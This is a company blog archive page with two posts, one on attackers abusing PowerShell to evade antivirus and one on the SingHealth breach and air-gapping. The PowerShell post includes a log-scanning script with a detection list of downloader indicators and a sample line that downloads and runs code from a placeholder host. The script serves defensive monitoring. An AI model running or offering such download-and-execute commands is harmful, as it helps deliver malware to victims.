cyberattackers | GIGE IT Solutions: IT Services Mississauga (https://gige.ca/tag/cyberattackers)

How do Cyberattackers Exploit your own Programs?
https://gige.ca/how-do-cyberattackers-exploit-your-own-programs
Thu, 28 Feb 2019 17:08:17 +0000


Due to major strides in cybersecurity protection in the past few years, cyberattackers have needed to find alternate methods of infiltrating victims’ computers. One strategy that has seen a recent increase is the exploitation of programs that already exist on victims’ computers, a strategy called “Living off the Land”. IBM has stated that over 57% of cyberattacks in 2019 have used this strategy to avoid detection by antivirus software. Furthermore, in a recent study IBM also found that one of the most common tools exploited by cyberattackers is a program called PowerShell. So how do cyberattackers exploit your programs?

What does PowerShell do?

The main function of PowerShell is to automate system tasks and to let administrators access and manage computers remotely. This provides massive productivity advantages, as administrators can manage and repair computer problems regardless of where the system is located. Other features of PowerShell, such as network sniffing, similarly improve IT workflows for system administrators.

Microsoft has preinstalled PowerShell on all its Windows systems since 2005, and since 2016 the software has become widely available on other operating systems as well.

How can it be exploited?

Many characteristics of PowerShell make it a prime target for cyberattackers. Most importantly, it is widely installed, since it comes prepackaged on Windows systems. Furthermore, it can run code directly in memory, which lets it bypass the usual security controls.

One strategy used by cyberattackers is to leverage PowerShell as a malicious downloader to install and propagate malware. For instance, the Trojan.Kotver malware exploits PowerShell to install advertising software on a system without the victim’s permission. In this case, the cyberattacker profits from the revenue generated by the victim’s non-consensual advertisement views.

Another piece of malware that exploits PowerShell is PowerGhost. It installs cryptomining software on the victim’s computer, essentially cryptojacking the infected system.

How do you protect yourself?

While cyberattackers can leverage frameworks like PowerShell to avoid detection during an attack, the initial infection often still relies on more traditional methods such as phishing or social engineering. Therefore, the best way to protect yourself is to become aware of the threats and the tell-tale signs of phishing attacks. With that said, there are also many strategies to reduce the risk that comes with using PowerShell.

Firstly, disable PowerShell altogether if it plays no part in your organization’s IT operations. If it must be used, keep a continuous record of its activity so that suspicious commands can be identified. Be particularly vigilant for activity coming from unknown locations or at strange times. Also, make sure the latest version of PowerShell is installed, as outdated versions pose an even greater security threat.
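As an added illustration of the monitoring and version advice above (example code written for this page, not code from the original post), the following PowerShell snippet reports the installed version, checks whether script block logging is switched on, and scans recorded script blocks for the downloader-style commands described earlier. The event log name, registry path and event ID 4104 are real Windows values; the sample script blocks and the placeholder URL are constructed, and the indicator list is an assumed starting point for review rather than a complete rule set.

```powershell
# Added example: audit PowerShell on a Windows host from a defender's point of view.
# 1. Report the installed version (older engines lack the logging features used below).
$version = $PSVersionTable.PSVersion
Write-Host "PowerShell version: $version"
if ($version.Major -lt 5) {
    Write-Warning "PowerShell 5.0 or newer is needed for script block logging; update the engine."
}

# 2. Check whether script block logging (event ID 4104) is enabled by policy.
$policyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
$enabled = (Get-ItemProperty -Path $policyPath -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue).EnableScriptBlockLogging
if ($enabled -eq 1) { Write-Host "Script block logging: enabled" }
else { Write-Warning "Script block logging is off; set EnableScriptBlockLogging=1 under $policyPath (via Group Policy)." }

# 3. Flag script blocks that resemble the downloader behaviour discussed in the post.
# These strings are assumed review indicators, not proof of compromise.
$suspicious = @(
    'DownloadString', 'DownloadFile', 'Invoke-WebRequest', 'Invoke-Expression',
    'FromBase64String', '-EncodedCommand', '-WindowStyle Hidden'
)
function Test-SuspiciousScriptBlock {
    param([string]$Text)
    # Return every indicator that appears in the script block text (case-insensitive match).
    $hits = $suspicious | Where-Object { $Text -match [regex]::Escape($_) }
    return @($hits)
}

# Constructed sample script blocks (not real events) so the scan also runs offline.
$samples = @(
    'Get-ChildItem C:\Reports | Measure-Object',
    'IEX (New-Object Net.WebClient).DownloadString("http://placeholder.invalid/x")',
    'powershell.exe -WindowStyle Hidden -EncodedCommand QQBCAEMA'
)

# Prefer real 4104 events when the operational log is readable; otherwise use the samples.
$blocks = $samples
try {
    $events = Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} -MaxEvents 200 -ErrorAction Stop
    # Property index 2 of a 4104 event holds the ScriptBlockText field.
    $blocks = $events | ForEach-Object { $_.Properties[2].Value }
} catch { Write-Host "No readable 4104 events; scanning the constructed samples instead." }

foreach ($b in $blocks) {
    $hits = Test-SuspiciousScriptBlock -Text $b
    if ($hits.Count -gt 0) { Write-Warning ("Review: [{0}] {1}" -f ($hits -join ', '), $b) }
}
```

Run it from an elevated prompt so the registry key and the operational log are readable; the two constructed samples after the benign one are expected to be flagged.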

Do not fall victim to cyberattack. Call us at +1 888 366 4443 for more information on how to keep yourself safe.

Network Separation: Is it an Impenetrable Security Measure?
https://gige.ca/network-separation-is-it-an-impenetrable-security-measure
Tue, 31 Jul 2018 17:11:17 +0000


A major malware attack against Singapore’s Health Service sector has motivated the Singaporean Government to adopt a new strategy for protecting these systems from future cyber threats. The security measure that will be employed is called “Network Separation”, and involves completely disconnecting computers from the internet.

The Cyberattack on SingHealth

SingHealth, short for Singapore Health Services, is the country’s largest group of healthcare institutions. A recent malware attack against it resulted in the theft of the personal information of over 1.5 million patients. People who visited its hospitals between May 1st 2016 and July 4th 2018 were among those affected. The exposed data included the names, National Registration Identity Card (NRIC) numbers, and dates of birth of these individuals.

In addition, the medical information of another 160 000 patients, including Singapore’s Prime Minister Lee Hsien Loong, was also stolen by the cyberattackers. This information included the medicines prescribed and dispensed to these patients. Neither the identity of the perpetrators nor the method of infiltration was discussed by the Ministry of Health in its statement.

Adopting a Drastic Defense Strategy

In response to this successful cyberattack, the Singaporean Government has adopted network separation, or “Air Gapping”, as the method of defense to be used against future attacks.

This practice involves disconnecting government systems that contain sensitive data from the internet, effectively creating an “air gap” between malware circulating on the internet and these critical computers. The most common methods of infecting systems with malware include malicious download links, social engineering, and scanning the web for out-of-date systems with exploitable holes in their security. Therefore, by disconnecting from the internet altogether, organizations can sever the cyberattackers’ pathway into their computers.

As noted by Singapore’s Deputy Prime Minister Teo Chee Hean, the strategy would have mitigated the damage of this cyberattack by “[disrupting] the cyber kill-chain for the hacker and [reducing] the surface area exposed to attack”. While the strategy has been widely employed in Singapore’s public sector since 2016, the country’s healthcare institutions have only just been disconnected.

While network separation is an effective way of eliminating cyberattack threats that come directly from the internet, it also has numerous disadvantages that need to be considered. The main upside of using an “Air Gap” to protect your organization’s systems is that it makes it impossible for malware to reach them through malicious download links on the internet. Furthermore, it makes your systems invisible to the automated scripts that constantly search for outdated servers to target.

However, this comes at a massive productivity tradeoff. As noted by Singapore’s Ministry of Health, “there will be some inconvenience for patients and healthcare staff”. This is because internal systems that rely on an internet connection to communicate with each other will also be unable to do so. For instance, if a doctor requires test results from the laboratory, they will now need to access that computer in person rather than simply pulling the data off the company server.

Furthermore, network-separated systems also require more maintenance, because they can no longer receive automatic updates distributed over the internet. As a result, patches will need to be downloaded and installed manually on these systems, and failure to do so will leave them highly vulnerable.

Finally, this strategy does not protect against malware distributed through offline means such as USB sticks. In fact, it may leave such systems even more vulnerable to these attacks, because they are no longer constantly checking for updates from developers.

Previous Breaches of Network Separated Systems

In 2010, an Iranian uranium enrichment plant was infected with the “Stuxnet” malware despite being air gapped from the internet. The virus was introduced into the system through USB flash drives and caused widespread disruption to the facility’s centrifuges.

Furthermore, “Brutal Kangaroo” is a malware toolkit believed to have been developed by the CIA specifically for infiltrating network-separated systems. Much like “Stuxnet”, it spreads through infected USB drives. A common way to offset the weaknesses of “Air Gapping” is to use it in tandem with data encryption, which encodes sensitive information on a computer so that it is unreadable even when attackers infect that computer with malware.

Air Gapping has both advantages and disadvantages as a security measure. When it is paired with other security measures such as data encryption, it becomes a highly effective way of preventing many types of malware from infecting your organization’s computers. Our experts at GigE have years of experience in designing and deploying security strategies tailored to your company’s needs. Contact us at +1 (888) 366-4443 to get started today.
